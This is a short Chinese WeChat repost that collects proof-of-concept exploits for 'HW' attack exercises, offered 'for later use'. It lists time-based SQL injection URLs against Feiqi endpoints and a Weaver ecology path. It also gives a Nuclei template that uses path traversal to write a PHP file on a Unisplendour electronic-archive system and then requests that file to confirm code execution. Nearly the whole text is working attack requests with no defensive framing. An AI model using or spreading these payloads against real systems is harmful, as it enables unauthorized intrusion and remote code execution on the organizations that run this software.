近期HW POC 收藏备用

飞企

/docexchangeManage/checkGroupCode.js%70?code=1%27;waitfor+delay+%270:0:5%27--+

/common/ajax_codewidget39.jsp;.js?code=1%27;waitfor+delay+%270:0:5%27--+

code=1%27;waitfor+delay+%270:0:5%27--+

/common/efficientCodewidget39.jsp;.js?code=1%27;waitfor+delay+%270:0:5%27--+

泛微

ecology /security/monitor/MonitorStatusForServer.jsp

紫光电子档案

id: msk-template

info:
name: msk-template
author: msk
severity: high

variables:
filename: "{{to_lower(rand_base(10))}}"

http:
- raw:
- |
POST /Setting/Report/DesignReportSave.html?report=../../../{{filename}}.php&token=java HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: winWidth=1920; winHeight=455
Upgrade-Insecure-Requests: 1

aa=<?php echo 111*111;?>&userID=admin&fondsid=1&comid=1

- |
GET /uploads/company1/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: winWidth=1920; winHeight=455

matchers:
- type: dsl
dsl:
- contains_all(body,"12321")

原文始发于微信公众号（网安守护）：近期HW POC 收藏备用